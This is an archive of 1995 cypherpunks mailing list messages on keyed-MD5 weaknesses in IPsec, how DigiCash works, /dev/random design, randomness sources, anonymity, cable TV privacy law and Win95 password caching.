I can't help that. We were very loud about our efforts and I
publicized them wherever I could. I mentioned drafts here on
cypherpunks and elsewhere frequently. We tried to solicit the help of
lots of people in the crypto community. I was begging people for help
with our MD5 and other transforms for months and months. I believe
that lots of people were aware of what was going on and just didn't
take us seriously until the last minute.

> I think this highlights one of the problems with the IETF we need a 
> much broader infrastructure for understanding what progress other 
> groups have made. The time when we can expect to do everything through 
> email alone is past.

I pretty much know whats going on throughout the IETF, although I
don't know all the petty details. I think that its a matter of trying
to remain plugged in and following the announcements of drafts.

> I wish I could persuade more people in the IETF that the Web
> infrastructure could provide a valuable assistance as a
> collaboration tool for their needs. Unfortunately the approach seems
> to be that because there are is a person living at the end of a 2400
> baud modem in vermont who cannot configure his PPP we should all
> continue in the stone age.

There are lots of IETF web pages already.

> We could improve readability of RFCs through using HTML

I truly dislike that idea. I hope that this never comes to pass. Text is
just fine. RFCs are perfectly readable right now. The problem is more
getting people to read them than legibility problems. If anything
would be an improvement it would be postscript, and I oppose that even
though its easy for anyone who wants to to get a postscript interpreter.

> I would like to see a collaboration system where I can present an expert
> with the context of a proposal very rapidly without expecting them to
> read the archives of an entire mailing list.

I would like to see such a thing as well. I would also like to see a
system which permitted perfectly just adjudicaiton of disputes without
need for evidence. Unfortunately, neither is possible.

Perry





From sdw at lig.net  Wed Nov  1 18:32:40 1995
From: sdw at lig.net (Stephen D. Williams)
Date: Thu, 2 Nov 1995 10:32:40 +0800
Subject: /dev/random for FreeBSD [was: Re: /dev/random for Linux]
In-Reply-To: <95Oct31.094528pst."14855(1)"@alpha.xerox.com>
Message-ID: <m0tAoYD-0009yxC@sdwsys>


Besides non-blocking, it's very useful sometimes to support SIGIO/SIGURG for
as many devices as possible.

I know only too well that Sybase CT_lib uses this for Async mode.
(I just tracked down what appears to be an HPUX process group bug preventing
 the signals from being delivered...)

In any case, using SIGIO is a whole parallel method to using a select loop,
and although it seemed like a hack when I found out they were using it, it
has some elegance since they chain to other possible signal handlers in
case other io descriptors are ready.

> Blocking vs. non-blocking is a standard issue in design of U*X devices.
> Standard solution: make it block by default, and accept an IOCTL to put it in
> non-blocking mode.  There's even a POSIX way to do this:
> 
> 	flags_or_err = fcntl(fd, F_GETFL, 0);
> 	{check for error}
> 	res = fcntl(fd, F_SETFL, flags_or_err | O_NONBLOCK);
> 	{check for error}

sdw
-- 
Stephen D. Williams 25Feb1965 VW,OH (FBI ID) sdw at lig.net http://www.lig.net/sdw
Consultant, Vienna,VA Mar95- 703-918-1491W 43392 Wayside Cir.,Ashburn, VA 22011
OO/Unix/Comm/NN       ICBM/GPS: 39 02 37N, 77 29 16W home, 38 54 04N, 77 15 56W
Pres.:Concinnous Consulting,Inc.;SDW Systems;Local Internet Gateway Co.;28May95





From fc at all.net  Wed Nov  1 18:38:22 1995
From: fc at all.net (Dr. Frederick B. Cohen)
Date: Thu, 2 Nov 1995 10:38:22 +0800
Subject: [FRED] Anonymity and Integrity
In-Reply-To: <199511011907.OAA16631@opine.cs.umass.edu>
Message-ID: <9511020130.AA17317@all.net>


> My turn to rise to the bait...
> 
> Dr. Frederick B. Cohen writes:
> > I have been thinking about the issues of anonymity for some time, and I
> > have been convinced for some time that you can't have both integrity and
> > anonymity.  
> 
> What's your working definition of "integrity" in this context ?

Integrity:= 1) Steadfast adherence to a strict moral and ethical code.
	2) A state of being unimpaired; soundness.
	3) The quality or condition of being whole or undivided; soundness
	Also) soundness, completeness,
Alternatively:
	1) Strict personal honesty and independence...
	2) Completeness; unity...
	3) The state of being unimpaired; soundness...''

In this context, I might be misinterpreted as having meant that it is
impossible to have both integrity and anonymity.  That is not what I
meant, although it is probably also true in a very strict sense.

To clarify, I don't think you can assure integrity when you have anonymity.

This follows from my earlier writings (circa 1984-89), which are fairly
extensive, and in which I made the only marginally supported claim that
you can't have (i.e., assure) both integrity and secrecy in a system
with sharing.  This came originally from the result that integrity +
secrecy = no sharing (ala the combination of Biba and Bell-LaPadula)
which was extended into a POset which characterizes the extent to which
integrity and secrecy can be maintained based on transitive information
flow.

The less mathematical reasoning is that in order to be able to verify
integrity, you have to be able to examine the information that is
secret, while having secrecy requires that you not be able to have
independent verification.  Thus the two limit each other. 

Anonymity, in this copntext, can be thought of as secrecy.

-- 
-> See: Info-Sec Heaven at URL http://all.net
Management Analytics - 216-686-0090 - PO Box 1480, Hudson, OH 44236





From cjs at netcom.com  Wed Nov  1 18:59:04 1995
From: cjs at netcom.com (cjs)
Date: Thu, 2 Nov 1995 10:59:04 +0800
Subject: [FRED] Anonymity and Integrity
In-Reply-To: <199511011907.OAA16631@opine.cs.umass.edu>
Message-ID: <199511011930.LAA28734@netcom20.netcom.com>


> My turn to rise to the bait...
> 
> Dr. Frederick B. Cohen writes:
> > I have been thinking about the issues of anonymity for some time, and I
> > have been convinced for some time that you can't have both integrity and
> > anonymity.  
> 
> What's your working definition of "integrity" in this context ?

Come on.. we're never gonna get Dr. Fred to go away if we keep giving
him attention.

Christopher






From zuhn at sctc.com  Wed Nov  1 19:18:36 1995
From: zuhn at sctc.com (david d `zoo' zuhn)
Date: Thu, 2 Nov 1995 11:18:36 +0800
Subject: D.C. (and other?) C'punx at C.S.I. show?
Message-ID: <v02130500acbd640d015c@[172.17.1.134]>


I'm going to be in D.C. for the CSI show next week (Nov 5-8), and would be
interested in getting together (dinner, beer, whatever) with other folks
interested in cypherpunkish things.  If a number of you respond, I'll try
to coordinate some sort of group event if at all possible.

Send me mail, give me a call, or stop by booth 111.


--
david d `zoo' zuhn  --  secure computing corporation  --  zuhn at sctc.com







From greg at ideath.goldenbear.com  Wed Nov  1 19:29:47 1995
From: greg at ideath.goldenbear.com (Greg Broiles)
Date: Thu, 2 Nov 1995 11:29:47 +0800
Subject: Cable TV Privacy (was Re: InfoWar)
Message-ID: <199511010907.AA28156@ideath.goldenbear.com>


-----BEGIN PGP SIGNED MESSAGE-----

Scott Brickner writes:

> David G. Koontz writes:
> > 
> >>Industry representatives played down the privacy loopholes.
> >>Ronald Plesser, a Washington attorney who represents online
> >>services and direct marketing firms, said, "I know of no
> >>example of anybody trafficking in e-mail descriptions." A
> >>spokeswoman for Hughes Electronics Corp.'s DirecTV said, "We
> >>do not release names of customers that ordered movies.
> > 
> >The name of the customer of a video tape rental may be disclosed
> >only under narrow constraints (USC 18 Chap 121 2710):

> Didn't you read the post?  The whole point was that the constraints
> *don't* cover many *new* technology.  Sure, your local video store
> can't release the data, but your *cable* company is under no such
> constraint with regard to pay-per-view.  Ditto with Hughes DirecTV.

Local cable TV companies *are* constrained re recordkeeping about
consumer choices and disclosure of that data - see 47 USC 551, the
"Cable Television Consumer Protection and Competition Act of 1992".
They must disclose at the time you sign up for service and once
yearly what data they keep about your watching/purchasing choices, and
who that data is disclosed to. They must dispose of that data when it
is no longer useful for the purpose for which it was collected. 
Consumers get liquidated damages of the greater of $100 per day or
$1000, plus attorney's fees and (maybe) punitive damages.

But I agree that cable TV != DirecTV, and that Hughes seems to be
unregulated in this field.

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMJc4e33YhjZY3fMNAQFJJAP+M0G3St6Bhtjxzukt6kmjUsBQO2htEY1/
RVaIpitdsT/mXBHzrlkE8zC6kBTwK2vFha47vSUO4WyOfEvS02sbzY99XR7VwuIo
z/LTgFpc89ZLxFOYEPITZ/7AV/8+8Yau3FmlNOrfBnhQTOPlCFOfWeUEYaZFi1BH
64bpq1copqk=
=CWe+
-----END PGP SIGNATURE-----





From stewarts at ix.netcom.com  Wed Nov  1 19:36:46 1995
From: stewarts at ix.netcom.com (Bill Stewart)
Date: Thu, 2 Nov 1995 11:36:46 +0800
Subject: ecash remailer
Message-ID: <199511020239.SAA27491@ix.ix.netcom.com>


At 01:20 PM 11/1/95 -0500, Michael Froomkin <froomkin at law.miami.edu> wrote:
>I thought a property of Chaumian DigiCash was that a coin *had* to go back
>to the bank before it could be spent again.  

No.  The basic Chaum Digicash method looks like this:
1) Alice creates a number of a recognizable form (Chaum's 1985 CACM paper
uses n1n2n3...n64n1n2n3....n64, i.e. a 64-bit number concatenated with itself).
2) Alice blinds the number and sends it to the bank (along with some request
for withdrawing money from her account or payment in other coin or whatever.)
3) The bank signs the number and sends it back.
4) Alice unblinds the coin; now it's good, recognizably signed, and untraceable.

5a) Alice gives the coin to Bob, who deposits it; the bank records the coin
number,
and in case of double-spending, the first person to the bank wins.
This is useful for on-line transactions, or off-line where everyone trusts
each other.

OR 5b) Alice gives the coin to Bob using a complicated cut&choose protocol that
doesn't give away her identity if it's only used once, but if she also gives the
same coin to Carol with the same protocol, Bob and Carol can identify Alice
with probability 1 - 1/2**n, for some adequately large n.  This is more work,
but you can use it for off-line transactions where you don't trust Alice
not to double-spend.  The protocol doesn't say what to do to Alice if you
catch her
cheating; depending on the environment you can debit her account or sue her etc.

6) Bob now has a number, signed by the Bank of Foo, which he can either give
to them
to deposit or get cash or use for highway toll (if Foo is really the highway
company)
or give to somebody else to spend (which is a little messy in the cut&choose
method.)

>Logically, I can see at least four possibilities:
>1) payee data is encoded onto the coin at time of payment, making it 
>impossible for Carol to bank the coin.  I see no evidence of this in the 
>docs at the Digicash site, but I just rechecked quickly and may have 
>missed it.

The basic protocol doesn't say anything about what a valid coin looks like;
you could use the example in Chaum's paper or a long string followed by
a checksum or whatever.  You _could_ put the payee's name account number
in the string as the 64-bit "random" number, or even put both payer and payee.
The bank could insist on that sort of thing if they wanted.
If I remember right, the version in the Digicash trial left you the choice
of filling in a specific payee or using "@" for bearer-payable coins.

>2) No payee data as such is encoded on the coin but it is marked "spent" 
>to prevent multiple uses by payee to the detriment of payor.  

The bank marks the coin spent upon deposit.

>3) the Digicash software only allows you to send a "spent" coin to the 
>bank.  You have to hack the software to send the coin to Carol (do you 
>have to break your own key?).

I don't know if their merchant-client software lets you do this or not,
but it's just a matter of implementation, not protocol.

>4) nothing in the DigiCash software or protocol prevents you from sending 
>a coin to Carol so long as you trust Carol not to get you in trouble by 
>misusing the coin in some way.  That's why Chaum is interested in 
>hardware based agents that would keep you from respending coins you receive.

Your problem isn't trusting Carol not to get you in trouble,
it's trusting Alice not to spend the coin again.
Hardware-based agents are interesting because they make it easier to
enforce double-spending prevention in off-line systems, and to offer
better anonymity because you've got more trust that the person didn't 
double-spend.  Stefan Brands has done a lot of work on this.

In on-line systems you can check whether a coin's been spent already
by depositing it - the problem is that on-line systems aren't
always convenient for many applications (e.g. newspaper machines),
and the costs of communication for an on-line system may be higher
than the cost of a sufficiently smart smart-card.
#---
#                                       Thanks;  Bill
# Bill Stewart, Freelance Information Architect, stewarts at ix.netcom.com
# Phone +1-510-247-0664 Pager/Voicemail 1-408-787-1281
#---






From tcmay at got.net  Wed Nov  1 19:43:17 1995
From: tcmay at got.net (Timothy C. May)
Date: Thu, 2 Nov 1995 11:43:17 +0800
Subject: Hit-and-Run Anonymous Posts (Re: "Dr." Fred)
Message-ID: <acbcfdc702021004f4bd@[205.199.118.202]>



Before someone corrects me:

I wrote:

"Exceptions are the cases when an anonymous source has something
"sensitive" to contribute, such as the release of the putative MD4 code,
and the like."

MD or RC4, I forget which it was. My point is that anonymity has been used
to post stuff like this (putatively), and that this is a "good" use of
anonymity. Good in the sense of being non-flamish, non-infantile.

(Not everyone thinks using anonymous posts to "liberate" intellectual
property is a "good" thing, but then I'm sure a lot of people don't think
it's good that the secrets of how to fix plumbing are written up in books
for all to read.)

--Tim May


Views here are not the views of my Internet Service Provider or Government.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay at got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
Corralitos, CA              | knowledge, reputations, information markets,
Higher Power: 2^756839      | black markets, collapse of governments.
"National borders are just speed bumps on the information superhighway."







From perry at piermont.com  Wed Nov  1 20:10:21 1995
From: perry at piermont.com (Perry E. Metzger)
Date: Thu, 2 Nov 1995 12:10:21 +0800
Subject: Keyed-MD5, and HTTP-NG
In-Reply-To: <9510018152.AA815244951@snail.rsa.com>
Message-ID: <199511011820.NAA02107@jekyll.piermont.com>



"baldwin" writes:
>         I also understand your being upset about not hearing about this
> attack the moment it was published.  Actually, as soon as RSA Labs confirmed
> the weakness we did call some of the editors of the IPsec specifications
> to let them know about it.  The consensus was that this was not a show
> stopper.

There were two names on the MD5 document -- mine and Bill
Simpson's. Bill didn't tell me that he was called (I suspect he would
have), and I wasn't called, either. We were the only two editors of
that portion of the specification.

Given that my name was on that document and that I made a large effort
to try to make sure that people examined the algorithms and thought
they were good, and that I have some of my reputation tied to that
document, I am rather unhappy at the fact that I only find out third
hand about what people in the field have determined about our selected
algorithm.

> The IPsec protocols could be rolled out as is.  Later, once a
> better authenticator had been developed and tested, it could be
> substituted for the existing one.  One of the excellent features of the
> IPsec specification is that new algorithms can be substituted easily
> (modulo a "small matter of programming").

I know. I was one of the designers. We all understood extremely well
that crypto algorithms become rapidly obsolete. However, we needed to
specify a reasonably strong baseline transform that would be widely
deployed. I was shocked at the level of trouble we had in getting the
cryptoweenies to successfully agree on a keyed hash based transform no
matter how long was spent on the topic. I've got to say that my
opinion of the academic crypto community dropped substantially after
the experience. I would have thought that people could at least have
agreed on what they knew and didn't know.  This was strikingly
different from my experience with other mathematical fields, in which
the experts seem to agree pretty readily about what is and isn't
known.

>         Perhaps your main complaint is that it took time for the attack
> to be confirmed by other researchers before the issue was brought to
> the IPsec authors.  That is another effect of the current state of the
> art in Cryptography, and an effect of the normal academic process.

People might have noted their suspicions to us. As engineers, we are
capable of avoiding something based on on suspected weakness without
solid confirmation -- we aren't trying to publish papers, we are
trying to get things to work.

Perry





From froomkin at law.miami.edu  Wed Nov  1 20:17:49 1995
From: froomkin at law.miami.edu (Michael Froomkin)
Date: Thu, 2 Nov 1995 12:17:49 +0800
Subject: ecash remailer
In-Reply-To: <199510311940.OAA31415@opine.cs.umass.edu>
Message-ID: <Pine.SUN.3.91.951101130302.2576B-100000@viper.law.miami.edu>


Now I am fully confused.

I thought a property of Chaumian DigiCash was that a coin *had* to go back
to the bank before it could be spent again.  Yet all "coin exchange"
schemes discussed here recently involve Alice paying Bob who then sends
the coin to Carol's Exchange who then sends it to the bank while sending
some other value, maybe a Carol coin, to Bob. 

Logically, I can see at least four possibilities:

1) payee data is encoded onto the coin at time of payment, making it 
impossible for Carol to bank the coin.  I see no evidence of this in the 
docs at the Digicash site, but I just rechecked quickly and may have 
missed it.

2) No payee data as such is encoded on the coin but it is marked "spent" 
to prevent multiple uses by payee to the detriment of payor.  ditto on 
the evidence.

3) the Digicash software only allows you to send a "spent" coin to the 
bank.  You have to hack the software to send the coin to Carol (do you 
have to break your own key?).

4) nothing in the DigiCash software or protocol prevents you from sending 
a coin to Carol so long as you trust Carol not to get you in trouble by 
misusing the coin in some way.  That's why Chaum is interested in 
hardware based agents that would keep you from respending coins you receive.

No doubt there are others.  Anyone know what the reality is?

A. Michael Froomkin        | +1 (305) 284-4285; +1 (305) 284-6506 (fax)
Associate Professor of Law | 
U. Miami School of Law     | froomkin at law.miami.edu
P.O. Box 248087            | http://www.law.miami.edu/~froomkin
Coral Gables, FL 33124 USA | It's warm here.






From nobody at REPLAY.COM  Wed Nov  1 20:22:34 1995
From: nobody at REPLAY.COM (Anonymous)
Date: Thu, 2 Nov 1995 12:22:34 +0800
Subject: IBM's Microkernal
Message-ID: <199511011817.TAA17785@utopia.hacktic.nl>



Responding to msg by perry at piermont.com ("Perry E. Metzger") on 
Wed, 01 Nov 11:51 AM

>Why is this being sent to cypherpunks? Its totally 
>irrelevant.


It's related to IBM's work on machine/code interface security, 
encryption and authentication capabilities. Cryptographers may 
want to examine how these work in Microkernal. If IBM will 
allow access to the features.


And it's related to parallel alarms sounded on cypherpunks 
about the impossibility of any durable security which does not 
anticipate ever-changing attacks devised by authors of 
competing products and services.


Finally, not your hat size, to be sure, it's related to the 
vanity of computer security consultants who dismiss unknown 
competition at the peril of their credibility.


"The free market is a terror for tortured souls." Anonymous.








From s1113645 at tesla.cc.uottawa.ca  Wed Nov  1 20:28:45 1995
From: s1113645 at tesla.cc.uottawa.ca (s1113645 at tesla.cc.uottawa.ca)
Date: Thu, 2 Nov 1995 12:28:45 +0800
Subject: IETF on the web.
In-Reply-To: <9511020101.AA05060@zorch.w3.org>
Message-ID: <Pine.3.89.9511012227.A48583-0100000@tesla.cc.uottawa.ca>




On Wed, 1 Nov 1995 hallam at w3.org wrote:

> email alone is past. I wish I could persuade more people in the IETF
> that the Web infrastructure could provide a valuable assistance

Have you tried <www.ietf.org> ? Seems to have all the relevant links,
Perry's stuff included.





From baldwin at RSA.COM  Wed Nov  1 20:29:40 1995
From: baldwin at RSA.COM (baldwin (Robert W. Baldwin))
Date: Thu, 2 Nov 1995 12:29:40 +0800
Subject: Keyed-MD5, and HTTP-NG
Message-ID: <9510018152.AA815244951@snail.rsa.com>


Perry,
        I wish that the field of cryptography was as well advanced
as the field of Bridge Building.  A modern Bridge Builder can design
a bridge that is easy to construct and will in fact last for 100 years.
Unfortunately, modern Cryptography is like Bridge Building in the
late 1800s.  Back then, it was possible to build bridges that did
last for 100 years but lots of cities refused to pay the extra costs
in materials, labor and time to make a solid bridge, and as a result
the bridges did not last.  To make it worse, there was no systematic
teaching of the best practices, so often no one would realize that
they had build and/or bought a weak bridge until the day that it
fell apart.
        The sad result of the state of the art in Cryptography is
that we end up with situations like the one you described where it
takes months to get agreement among Cryptographers and then it turns
out that one of the other choices would have been better.  Not
surprisingly, the other choices often run slower than the initial choice.
However, there is little guarantee that the second choice will resist
all new attacks.  One of the reasons that the IPsec authenticator was
analyzed was that it had been chosen as the IPsec authenticator.  As soon
as a large organization picks a new authenticator, the researchers will
try their hand on breaking that one.  In the field of Cryptographic
Engineering, we just don't have a well tested construct for authenticators.
        If the IPsec group was run by scientists instead of engineers,
then they would consider cryptographic constructs that have "provable"
security properties (e.g., faking this authenticator is as hard as
factoring a Blum integer (a composite number with two strong primes)).
The downside of having this kind of provable security is that the
packet processing time would be enormous.  You would loose all the
benefits of a T1 connection to the Internet in order to get provable
security on your authenticator or encryptor.  Speaking for myself,
I am glad that the IETF is run by engineers.

        The vitriol you spewed is quite justified.  People at RSA and
IBM both agreed that the IPsec authenticator would resist all known
attacks.  In fact, a fully conforment IPsec implementation will still
resist the new attack because IPsec requires that the all keys be
changed every 2**32 packets.  However, this new attack makes Cryptographers
nervous.  Perhaps it could be extended to work with only 2**40 chosen packets
in which case there is a noticeable chance of it succeeding with only
2**32 packets.  Only further research will tell.  Currently, the only way
to get the MD5 key is to feed in 2**60 chosen messages of various lengths.
Of course, this is another good reason to use different keys for the
MD5 authenticator and packet encryption.  Wisely, IPsec requires different
keys for the authenticator and the encryptor.
        I also understand your being upset about not hearing about this
attack the moment it was published.  Actually, as soon as RSA Labs confirmed
the weakness we did call some of the editors of the IPsec specifications
to let them know about it.  The consensus was that this was not a show
stopper.  The IPsec protocols could be rolled out as is.  Later, once a
better authenticator had been developed and tested, it could be
substituted for the existing one.  One of the excellent features of the
IPsec specification is that new algorithms can be substituted easily
(modulo a "small matter of programming").
        Perhaps your main complaint is that it took time for the attack
to be confirmed by other researchers before the issue was brought to
the IPsec authors.  That is another effect of the current state of the
art in Cryptography, and an effect of the normal academic process.
It takes time to understand and confirm a weakness, and it is necessary
to confirm weaknesses (researchers make mistakes in designing attacks
just like they make mistakes in designing ciphers).  That's the way
things are in "cryptography today".

        I guess my conclusion is to say "Sorry".  Several professional
cryptographers gave it their best shot, and the authenticator turned
out to be somewhat weaker than expected.
                --Bob


______________________________ Reply Separator _________________________________
Subject: Re: Keyed-MD5, and HTTP-NG 
Author:  perry at piermont.com at INTERNET
Date:    10/31/95 5:25 PM

"baldwin" writes:
> Simon,
>         There are a few different ways to add key material to MD5 to
> make it suitable as a shared-secret authenticator function.  Some of these 
> are less resistant to attacks than others.  For example, the keyed MD5
> mechanism that is part of the current IPsec specifications can be
> attacked using 2**60 chosen messages.  Fortunately, the IPsec specs
> also require that the shared MD5 key be changed every 2**32 messages, 
> so this attack is unlikely to succeed.  Specifically, IPsec uses
> MD5 as follows:  X = MD5(key | keypad | Message), where "|" means 
> concatenation and the "keypad" pads out the key to 512 bits.
> Basically, this function is the same as standard MD5 with a
> different initialization vector for the compression operation 
> on the first block of the message.
>         RSA Labs recommends that a people use an authenticator like
> X = MD5(key1, MD5(key2, Message)).  This resists the chosen plaintext 
> attacks that were published at the crypto conference in Spring 1995.

Pardon me. The amount of vitriol I am going to spew is probably 
difficult for people to understand because most folks around here 
weren't following the keyed MD5 discussions during the IPSEC work and 
have no idea of the sort of crap the professional cryptographic 
community put us through.

We spent months, and months, and months, and months, getting advice 
from every cryptographer on the planet. Every conceivable combination 
of pads, multiple keys, keys before the text, after, before and after, 
etc., was discussed over and over and over again.

Finally, the folks at RSA and IBM both agreed that Hugo's scheme, the 
one we were putting in to place, was the best possible one. (Thats the 
one with the padded key.)

What the flying hell are you doing telling us now, and indeed not even 
telling the IPSEC community but instead mumbling on cypherpunks, that 
you guys were in possession of information BEFORE the entire 
discussion in midsummer that indicated that your own advice was wrong?

Perry






From adisaacs at mtu.edu  Wed Nov  1 22:27:58 1995
From: adisaacs at mtu.edu (Andrew D. Isaacson)
Date: Thu, 2 Nov 1995 14:27:58 +0800
Subject: Video as a source of randomness
Message-ID: <199511020602.BAA23380@supreme.csl.mtu.edu>


A thought just occurred to me...

How useful would it be to use a video stream as a source of random input
to something like /dev/random?  I'm thinking along the lines of a
Connectix QuickCam (sp?) or the cool videocam that comes with the Indy.
It seems to me that the picture recieved by a camera sitting atop a
monitor would be quite unpredictable. (relatively) High bandwith, too.
Even if the entropy in a video signal is low, the high bandwidth would
seem to make up for it.

Struggling to keep my head above the crypto tide,
andy
-- 
Andrew Isaacson <adisaacs at mtu.edu>    finger adisaacs at colossus.csl.mtu.edu 
Freshman/Comp Sci @ Michigan Technological University   for PGP public key
==========================================================================
"Hi, I'm, I'm, I'm... you'll have to forgive me, I'm terrible with names."





From weidai at eskimo.com  Wed Nov  1 22:30:40 1995
From: weidai at eskimo.com (Wei Dai)
Date: Thu, 2 Nov 1995 14:30:40 +0800
Subject: Rivest on the Design of RC4
In-Reply-To: <9510018152.AA815247765@snail.rsa.com>
Message-ID: <Pine.SUN.3.91.951101214900.28122A-100000@eskimo.com>


>         Professor Ron Rivest will be presenting a talk titled
> "The Design of RC4" at the RSA Data Security Conference in San Francisco
> (January 17 to 19).  It should be interesting.

What will the legal status of RC4 be after this talk?  Will RSADSI stop 
claiming that RC4 is still protected as a trade secret, or will everyone 
attending the talk be required to sign NDAs?

Wei Dai





From llurch at networking.stanford.edu  Wed Nov  1 22:55:54 1995
From: llurch at networking.stanford.edu (Rich Graves)
Date: Thu, 2 Nov 1995 14:55:54 +0800
Subject: Win95 password caching
In-Reply-To: <478rbq$o31@yuma.ACNS.ColoState.EDU>
Message-ID: <199511020642.WAA17156@Networking.Stanford.EDU>


(A copy of this message has also been posted to the following newsgroups:
csu.windows95,
comp.os.ms-windows.win95.misc,comp.os.ms-windows.win95.setup,comp.security.misc,alt.security,comp.os.ms-windows.networking.misc,comp.os.ms-windows.networking.windows,comp.os.ms-windows.nt.admin.networking)

[A little more context and Message-ID added from the original post;
cross-posted to nt.admin because it will affect some of you, followups
out]

In article <4791l0$4n14 at holly.ACNS.ColoState.EDU>,
unicorn at holly.ACNS.ColoState.EDU (Scott McCormack) wrote:

> In article <478rbq$o31 at yuma.ACNS.ColoState.EDU>,
> Jim Carlson (jimc at cnr.colostate.edu) wrote:
> : Does anyone know how to stop Win95 from caching the windows password?
> : We are thinking of using Win95 as the client for a student lab and 
> : need to find a way to stop it from caching passwords.  As it is, when
> : you log into a machine for the first time it creates a .pwl file in 
> : your windows directory for each person who logs into windows.  This 
> : is not acceptible for a lab situation.
> :
> : I can turn this off in WfWG by placing the line "passwordcachine=no" 
> : in the system.ini under [NETWORK], but this does not work in Win95.
> :
> : I am running MS networking in Win95, so when you first log into, 
> : windows it asks you to log into the MS Network.  It then comes up with 
> : a second box asking you to enter your Win95 password.  You can enter 
> : a blank password (""), but it still creates a .pwl file and places a
> : line in win.ini.
> 
> Change the password for the login (or when you first login) to a blank 
> line (ie don't enter a password) and you'll never see that login prompt 
> again. :)

This was not the question. He wants to prevent local Windows passwords
from being created for network-only users. This is a serious security
issue, because if a user enters her real network password for the Windows
password, and someone else later picks up the .PWL files, which are not
encrypted in a particularly secure way, then someone can get unauthorized
access to the network as the previous user(s).

We believe we have found answers in the Registry and in POLEDIT. We've
also turned up another related security bug. When it's confirmed, we'll
post. In the mean time, you can read the last couple messages archived at
gopher://quixote.stanford.edu/1m/win95netbugs.

-rich
 llurch at networking.stanford.edu
 moderator of the win95netbugs list
 http://www-leland.stanford.edu/~llurch/win95netbugs/faq.html





From mark at lochard.com.au  Wed Nov  1 23:10:25 1995
From: mark at lochard.com.au (Mark)
Date: Thu, 2 Nov 1995 15:10:25 +0800
Subject: Hit-and-Run Anonymous Posts (Re: "Dr." Fred)
In-Reply-To: <acbcfb6801021004664c@[205.199.118.202]>
Message-ID: <199511020706.AA20612@junkers.lochard.com.au>


>Pseudonyms are another matter entirely. Some are classy (Pr0duct Cypher,
>Black Unicorn, Lucky Green), some are oafish (S Boxx), some are ephemeral.
>Persistence of the identity, as when backed by digital signatures, is
>important. (Though not essential, yet.)

You forgot (how could you?!??) BIFF!!!

:)
Mark





From don at cs.byu.edu  Wed Nov  1 23:21:10 1995
From: don at cs.byu.edu (don at cs.byu.edu)
Date: Thu, 2 Nov 1995 15:21:10 +0800
Subject: MD5 of CFS131, hacktic
Message-ID: <199511020513.WAA00191@wero.byu.edu>


-----BEGIN PGP SIGNED MESSAGE-----

>From: Andreas Bogk <andreas at artcom.de>
>Please report any leakage of this software immediately to this list.

>From: Mats Bergstrom <asgaard at sos.sll.se>
>Try ftp://utopia.hacktic.nl/pub/replay/crypto/CRYPTOapps/cfs.1.3.tar.gz


I diffed 1.3 that CFS that I got from att research. The package arrived
to hacktic intact.

I sent PGP-signed MD5 of 1.3.1 to utopia, but got this back:


>From: Oliver Daudey <traveler at utopia.hacktic.nl>
>Subject: Re: CFS 1.3.1
>Date: Mon, 30 Oct 1995 15:51:10 +0100 (MET)
>
>> I have done an md5 on the new cfs. (Everything after the cutmarks)
>> Here it is. Hope you have it soon...
>> 
>> 262b4c6fbec7c729e3e10292f5ea8afb cfs.1.3.1
>> 
>> Don
>
>Sorry, but I need something which is certified with the SSH distribution-
>key (keyID DCB9AE01).



Hmmmm ok. Well, I'll sign it again, for you Cpunks. If you get a different
MD5 (this is everything AFTER the cutmarks) we can diff it.

Don

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQB1AwUBMJhTJcLa+QKZS485AQHsIwL/fkh8d39uW8M7Fo/slO6Rbb42j7tneqz2
wcePuYqyjGFN93IfjPI0ew1jjNqnzI+je6C0dBhk4eTjN7xAFczTqe1U6+yAKZX5
DnX2waPV/i8Pva0NB0t5lzRfCaB1OM/r
=8IC6
-----END PGP SIGNATURE-----
<don at cs.byu.edu>           fRee cRyPTo!   jOin the hUnt or BE tHe PrEY
PGP key - http://students.cs.byu.edu/~don   or PubKey servers (0x994b8f39)
  June 7&14, 1995: 1st amendment repealed.  Junk mail to root at 127.0.0.1
* This user insured by the Smith, Wesson, & Zimmermann insurance company *





From tcmay at got.net  Wed Nov  1 23:46:04 1995
From: tcmay at got.net (Timothy C. May)
Date: Thu, 2 Nov 1995 15:46:04 +0800
Subject: Video as a source of randomness
Message-ID: <acbdb0df0002100432a7@[205.199.118.202]>


At 6:02 AM 11/2/95, Andrew D. Isaacson wrote:
>A thought just occurred to me...
>
>How useful would it be to use a video stream as a source of random input
>to something like /dev/random?  I'm thinking along the lines of a
>Connectix QuickCam (sp?) or the cool videocam that comes with the Indy.
>It seems to me that the picture recieved by a camera sitting atop a
>monitor would be quite unpredictable. (relatively) High bandwith, too.
>Even if the entropy in a video signal is low, the high bandwidth would
>seem to make up for it.
>
>Struggling to keep my head above the crypto tide,

Digitized video input, especially from something like a noisy channel (t.v.
channel, for example), is quite likely to produce a lot more entropy bits
per second than nearly any of us ever need. (One's PGP key could be seeded
in a fraction of a millisecond, for example.)

The issue is that most people don't need this number of entropy bits per
second, and that most people don't have video inputs. (And those that do
may not have them hooked up and ready to go.) One of the basic ideas we
have had, as Cypherpunks, is to encourage widespread methods. Any methods
that need special hardware tend to not get widely used.

Audio, video, disk timing, and all sorts of other sources of physical
randomness are useful to have, but most people either won't have the right
configuration or won't configure their systems so as to use their
configuration.

--Tim May, who has both audio and video digitizers built into his Power
Macintosh 7100av, but notes that none of the crypto programs he uses has
any provision for using them, and so he doesn't use them for crypto
purposes.

Views here are not the views of my Internet Service Provider or Government.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay at got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
Corralitos, CA              | knowledge, reputations, information markets,
Higher Power: 2^756839      | black markets, collapse of governments.
"National borders are just speed bumps on the information superhighway."







From gjeffers at socketis.net  Thu Nov  2 00:32:23 1995
From: gjeffers at socketis.net (Gary Jeffers)
Date: Thu, 2 Nov 1995 16:32:23 +0800
Subject: Was I censored before Cypherpunks?
Message-ID: <199511021217.GAA09629@mail.socketis.net>


::
Encrypted: PGP

-----BEGIN PGP MESSAGE-----
Version: 2.6.2

hEwDG6rHcT8LtDcBAf4v0sGjue3ZVsxWwjDhAE8fTNr/lxNfGZdCi7cUTsN0zjS1
iHIpCESOg8vnjt+J3Dv8MQ6e+AicO09nMNbUZpLupgAAC2B5a0zYlHjaqRo3ZcC8
